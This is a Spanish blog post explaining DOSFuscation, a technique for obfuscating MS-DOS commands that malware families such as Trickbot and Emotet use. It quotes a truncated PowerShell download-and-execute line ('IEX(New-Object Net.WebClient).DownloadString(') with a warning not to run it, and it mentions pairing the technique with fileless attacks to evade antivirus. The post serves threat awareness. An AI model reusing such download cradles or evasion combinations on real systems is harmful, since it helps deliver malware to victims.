DOSFuscation una nueva manera de propagar malware
Recientemente se han reportado casos de malware que están empleando una técnica conocida como DOSFuscation para la ejecución y propagación del código malicioso, dentro de los casos nuevos se encuentran aquellos que responden al nombre de Trickbot y Emotet.
DOSFuscation como su nombre lo sugiere es un mecanismo para "ofuscar" comandos válidos de MS-DOS en lo que parecería a simple vista un archivo malformado de texto.
Para muestra basta un botón:
En la imagen se muestra un archivo .bat que contiene un mecanismo simple de DOSFuscation, el cual, tras ser interpretado ejecuta una simple, pero efectiva linea de comandos para descargar otro componente del malware.
NOTA: No ejecute este comando en su equipo.
echo iex("IEX(New-Object Net.WebClient).DownloadString(
Tal y como se puede observar, el texto resultante es de sólo una linea de unas cuantas palabras en comparación con el código ofuscado. Así mismo, se emplean comandos propios del sistema operativo lo que vuelve un poco mas complicado su detección y por lo tanto su prevención.
En esta muestra de malware, se descarga una dll que contiene el componente que posteriormente ejecutará otras acciones en el sistema infectado, sin embargo es necesario considerar que esta técnica puede combinarse con un Fileless Attack o con un Process Doppelgänging, con lo que, de contar con un Antivirus o Control de Aplicaciones, este puede ser evadido a través de la combinación de estas técnicas.
Como tal la técnica de ofuscación de comandos o DOSFuscation se comenzó a explorar a finales del año pasado, sin embargo, como se ha comentado, existen variantes de malware que la comienza a utilizar activamente para su propagación.
Referencias:
Comentarios
Publicar un comentario
Si tienes algún comentario sobre esta publicación o alguna inquietud del tema expuesto por favor escribe tus comentarios.